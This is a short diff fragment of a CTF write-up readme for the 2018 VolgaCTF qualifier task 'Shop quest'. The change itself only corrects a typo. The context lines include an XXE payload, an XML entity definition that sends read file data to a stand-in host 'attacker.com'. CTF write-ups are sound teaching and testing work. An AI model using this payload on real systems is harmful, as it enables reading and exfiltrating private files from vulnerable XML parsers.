shvetsovalex/ctf/2018/VolgaCTF-quals/Shop quest/readme.md

 <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?%data;'>">
 ```

-We recieved index.php and than we have to read several files to find the file download code:
+We received index.php and than we have to read several files to find the file download code:
 ```
 require_once 'utils/Core.php';
 ```